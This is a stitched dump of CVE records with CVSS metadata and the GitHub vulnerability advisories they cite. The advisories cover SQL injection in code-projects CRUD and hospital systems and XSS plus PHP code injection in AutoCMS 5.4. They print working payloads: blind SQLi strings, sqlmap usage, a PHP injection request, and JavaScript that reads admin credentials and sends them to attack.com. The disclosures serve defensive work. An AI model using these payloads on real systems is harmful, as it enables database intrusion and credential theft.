Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.116:125/edit.php?id=2 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=91n8tlusg53s0gag34n66htunh Connection: keep-alive sid=2&sname=Anita+Chettri&saddress=%23654+KD+Building+Mumbai&sclass=2&sphone=9874587456 --- ## Vulnerability type: + time-based blind + boolean-based blind ## Vulnerability location: + 'sid' parameter ## Payload: --- Parameter: sid (POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: sid=(SELECT (CASE WHEN (8647=8647) THEN 2 ELSE (SELECT 5722 UNION SELECT 2124) END))&sname=Anita Chettri&saddress=#654 KD Building Mumbai&sclass=2&sphone=9874587456 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: sid=2 AND (SELECT 2320 FROM (SELECT(SLEEP(5)))swyl)&sname=Anita Chettri&saddress=#654 KD Building Mumbai&sclass=2&sphone=9874587456 --- + ![1](https://github.com/user-attachments/assets/c2dfb888-f8df-4c08-8330-841bc5b4a076) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: + ![2](https://github.com/user-attachments/assets/61c17dfb-3dae-4020-b235-1e78001e2dde) + ![3](https://github.com/user-attachments/assets/c78ac277-e8fa-4fd4-acd2-71169096b3cc) + ![4](https://github.com/user-attachments/assets/eed0234a-ac32-4ddf-adac-aced12d7a133) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
code-projects.org"Crud Operation System" in PHP 1.0 "updatedata.php" SQL injection
https://api.github.com/repos/Kangsiyuan/1/issues/1/comments
0
2024-09-11T03:56:30Z
2024-09-11T03:56:30Z
https://github.com/Kangsiyuan/1/issues/1
2,518,398,732
1
6,271
CVE-2024-8866
2024-09-15T02:15:01.900
A vulnerability was found in AutoCMS 5.4. It has been classified as problematic. This affects an unknown part of the file /admin/robot.php. The manipulation of the argument sidebar leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Hebing123/cve/issues/68" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.277503" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?id.277503" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.407460" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:autocms_project:autocms:5.4:*:*:*:*:*:*:*", "matchCriteriaId": "07746BD9-33B7-43BD-A742-EA1878F842D4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Hebing123/cve/issues/68
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Hebing123", "cve" ]
# Summary AutoCMS v5.4 is affected by a Cross-Site Scripting (XSS) vulnerability and a PHP Code Injection vulnerability. The XSS vulnerability can be exploited to capture administrator credentials, which can then be used to exploit the PHP Code Injection vulnerability. # Details ## Cross-Site Scripting (XSS) Vulnerability Affected Component: /admin/robot.php Description: The application fails to sufficiently sanitize and escape input parameters page and sidebar. An attacker can craft a malicious URL that, when accessed by an administrator, will execute arbitrary JavaScript code. ## PHP Code Injection Affected Component: /admin/site_add.php Description: The application mishandles the txtsite_url parameter, allowing attackers to inject PHP code. By crafting a specific value for txtsite_url, an attacker can execute arbitrary PHP code on the server. # POC 1, Host a JavaScript file on the attacker's server. JavaScript Payload Code: ``` var xhr = new XMLHttpRequest(); xhr.open('GET', 'http(s)://target-ip/admin/index.php?sidebar=10', true); xhr.onload = function() { if (xhr.status >= 200 && xhr.status < 300) { var parser = new DOMParser(); var doc = parser.parseFromString(xhr.responseText, 'text/html'); var username = doc.querySelector('input[name="txtusername"]').value; var password = doc.querySelector('input[name="txtpassword"]').value; var newUrl = 'http(s)://attack.com/log.php?username=' + encodeURIComponent(username) + '&password=' + encodeURIComponent(password); var xhr2 = new XMLHttpRequest(); xhr2.open('GET', newUrl, true); xhr2.onload = function() { if (xhr2.status >= 200 && xhr2.status < 300) { console.log('Okk!'); } else { console.error('NO! Status:', xhr2.status); } }; xhr2.onerror = function() { console.error('Network!'); }; xhr2.send(); } else { console.error('NO!', xhr.status); } }; xhr.send(); ``` 2, Send a malicious URL to the target administrator: `http(s)://target-ip/admin/robot.php?page=1&sidebar=1%22%3E%3CsCRiPt/SrC=//attack.com/1.js%3E` After the administrator clicks on the link, we will obtain the username and password, allowing us to log into the backend and exploit the code injection vulnerability to control the server. ![image](https://github.com/user-attachments/assets/33b15157-2c11-406a-bab7-b7f6b8b98327) 3. Upon using the POC, we only need to access `http(s)://target-ip/config/hebing123/config.php` to see that we have successfully executed the phpinfo function. POC: ``` POST /admin/site_add.php?save=ok HTTP/1.1 Host: target-ip Content-Length: 951 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Cookie: [admin-cookie] Accept-Language: zh-CN,zh;q=0.9 Connection: close txtsiteurl=hebing123&txtsite_url=http%3A%2F%2Fwww.aaa.com&txttarget_url=1";%0dphpinfo();%0d$test="1&txtTDK=1&txtreplace_mode=0&txtTDKasc=0&txtindex_title=%E8%BF%99%E6%98%AF%E9%A6%96%E9%A1%B5%E6%A0%87%E9%A2%98&txtindex_keywords=&txtindex_description=&txtcapture_mode=0&txtanti_theft=1&txtuser_curl=1&txtuser_agent=baidu&txtother_agent=Mozilla%2F5.0+%28Windows+NT+6.2%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F32.0.1667.0+Safari%2F537.36&txtuser_client=auto&txtnochange=.zip%7C.rar%7C.avi%7C.jpg%7C.gif%7C.png&txtjump_mode=0&txtjump=http%3A%2F%2Fwww.so.com&txtjump_title=%E6%A1%86%E6%9E%B6%E8%B0%83%E7%94%A8%E6%A0%87%E9%A2%98&txtchange_link=0&txtlink_name=link.php&txturl_encode=1&txtnochange_url=127.0.0.1%7Cautocms.cn&txtcache_time=0&txtcache_index=0&txtcache_img=1&txtshield_spider=1&txtspider_tj=1&txtspider_name=semrushbot%2Cmj12bot%2Cteoma%2Ctwiceler%2Cscrubby%2Crobozilla%2Cgigabot%2Cahrefsbot%2Cpetalbot%2Cdotbot ``` ![image](https://github.com/user-attachments/assets/c9b7a645-8e1f-4f05-8aa0-5104bff4d474)
AutoCMS v5.4 XSS and RCE
https://api.github.com/repos/Hebing123/cve/issues/68/comments
1
2024-08-13T07:37:01Z
2024-09-14T07:10:17Z
https://github.com/Hebing123/cve/issues/68
2,462,624,535
68
6,272
CVE-2024-8868
2024-09-15T03:15:02.153
A vulnerability was found in code-projects Crud Operation System 1.0. It has been rated as critical. This issue affects some unknown processing of the file savedata.php. The manipulation of the argument sname leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/a/issues/7" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.277505" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.277505" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.408322" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:code-projects:crud_operation_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D15BB350-68BE-4E74-B9CE-BC9120B6F230", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/a/issues/7
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ppp-src", "a" ]
![3](https://github.com/user-attachments/assets/ceb913c5-e5ac-4fcf-8710-3815de3df6ca) # code-projects.org"Crud Operation System" in PHP 1.0 "savedata.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code ## Vendor Homepage + https://code-projects.org/crud-operation-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xxxx ## Vulnerable File + savedata.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/731e738a-548f-4e50-adb7-0ac0a36236d3 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'savedata.php ' file of the 'Crud Operation System' project. The reason for this issue is that attackers inject malicious code from the parameter "sname" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Crud Operation System", "xxx" discovered a critical SQL injection vulnerability in the "savedata.php " file. This vulnerability stems from insufficient user input validation of the "sname" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST /savedata.php HTTP/1.1 Host: 192.168.1.116:125 Content-Length: 35 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.116:125 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.116:125/add.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=91n8tlusg53s0gag34n66htunh Connection: keep-alive sname=1&saddress=1&class=2&sphone=1 --- ## Vulnerability type: + time-based blind ## Vulnerability location: + 'sname' parameter ## Payload: --- Parameter: sname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: sname=1' AND (SELECT 2172 FROM (SELECT(SLEEP(5)))YnZV) AND 'OooQ'='OooQ&saddress=1&class=2&sphone=1 --- + ![1](https://github.com/user-attachments/assets/9fef0d84-96b4-4f25-9ed7-433dc6c7cded) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: +![2](https://github.com/user-attachments/assets/cd831f58-1e7d-4c54-b953-f8a39b5b1701) + ![3](https://github.com/user-attachments/assets/d8184b7c-bf60-4671-9faf-93cbc9f71e46) + ![4](https://github.com/user-attachments/assets/033217f5-f05b-40fe-a8a0-b9132a384585) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
# code-projects.org"Crud Operation System" in PHP 1.0 "savedata.php" SQL injection
https://api.github.com/repos/ppp-src/a/issues/7/comments
0
2024-09-14T06:50:03Z
2024-09-14T06:50:03Z
https://github.com/ppp-src/a/issues/7
2,526,035,039
7
6,273
CVE-2024-8944
2024-09-17T18:15:05.690
A vulnerability, which was classified as critical, was found in code-projects Hospital Management System 1.0. This affects an unknown part of the file check_availability.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/65241/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Patch", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.277761" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.277761" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.408871" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fabianros:hospital_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7FD44159-7FA3-4BA5-AD83-C1D439EEF374", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/65241/cve/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "65241", "cve" ]
# code-projects Hospital Management System Using PHP With Source Code v1.0 check_availability.php SQL injection # emailOF AFFECTED PRODUCT(S) + Hospital Management System Using PHP With Source Code ## Vendor Homepage + https://code-projects.org/hospital-management-system-using-php-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + rootme30 ## Vulnerable File + check_availability.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/e13ce994-d280-4a64-90fb-f08663479bb4 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'check_availability.php' file of the 'Hospital Management System Using PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "email" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="686" alt="1" src="https://github.com/user-attachments/assets/d0a32b13-9158-4a09-aeb0-682719d695d2"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input verification for the "email" parameter, a serious SQL injection vulnerability has been discovered in the "Hospital Management System Using PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login verification required # Vulnerability details and POC ``` POST /hms/check_availability.php HTTP/1.1 Host: 192.168.203.199:1218 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 19 Origin: http://192.168.203.199:1218 Connection: close Referer: http://192.168.203.199:1218/hms/registration.php Cookie: PHPSESSID=0mi2ldjjhl6u55bftg19fatl84; pma_lang=zh_CN; phpMyAdmin=ecgqsunqkk259gps6g855hpj7h; pmaUser-1=%7B%22iv%22%3A%22XCt6WG5l8jF93ZNn8aw0gw%3D%3D%22%2C%22mac%22%3A%2200a51771b9141770e6b859aa0d04353eda02b3c3%22%2C%22payload%22%3A%22yQBymdYR171xOgwHdZj8kQ%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%22pWtm%5C%2FRqRJaUxcIEYY65xuQ%3D%3D%22%2C%22mac%22%3A%22aed483f364ce5dde1c3d367c399a45081d9e1e53%22%2C%22payload%22%3A%22H6CYC%5C%2FW40soknhBMNNUVcs6GbzmqoaAfuJvX1LwioPE%3D%22%7D; Attendance_Management_System=m9le8it5h61k0g6rddsuoes9a3 Priority: u=0 email=123123@ww.com ``` ## Vulnerability type: + time-based blind + boolean-based blind ## Vulnerability location: + 'email' parameter ## Payload: ``` arameter: email (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: email=123123@ww.com' OR NOT 6413=6413# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=123123@ww.com' AND (SELECT 1219 FROM (SELECT(SLEEP(5)))FsVM)-- Fzop ``` <img width="575" alt="2" src="https://github.com/user-attachments/assets/fc2305a3-de2b-42c5-8ef5-27a306a84ff7"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="530" alt="3" src="https://github.com/user-attachments/assets/252bcf38-0ecb-4a7c-b8b4-f3b0d2b08da7"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
code-projects Hospital Management System Using PHP With Source Code v1.0 check_availability.php SQL injection
https://api.github.com/repos/65241/cve/issues/1/comments
0
2024-09-16T06:57:17Z
2024-09-16T06:57:18Z
https://github.com/65241/cve/issues/1
2,527,653,063
1
6,274
CVE-2024-8946
2024-09-17T19:15:29.220
A vulnerability was found in MicroPython 1.23.0. It has been classified as critical. Affected is the function mp_vfs_umount of the file extmod/vfs.c of the component VFS Unmount Handler. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 29943546343c92334e8518695a11fc0e2ceea68b. It is recommended to apply a patch to fix this issue. In the VFS unmount process, the comparison between the mounted path string and the unmount requested string is based solely on the length of the unmount string, which can lead to a heap buffer overflow read.
